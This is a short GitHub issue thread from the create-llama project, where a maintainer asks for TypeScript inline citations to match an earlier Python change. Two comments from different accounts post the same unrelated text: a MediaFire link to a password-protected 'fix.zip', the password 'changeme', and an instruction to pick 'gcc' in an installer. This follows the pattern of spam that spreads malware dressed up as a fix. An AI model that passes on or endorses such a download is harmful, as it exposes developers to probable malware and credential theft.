### ISSUE TITLE
Add inline citation for TS

### ISSUE THREAD

**Issue by marcusschiesser** [run-llama/create-llama#251]
same as for Python see: https://github.com/run-llama/create-llama/pull/175

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
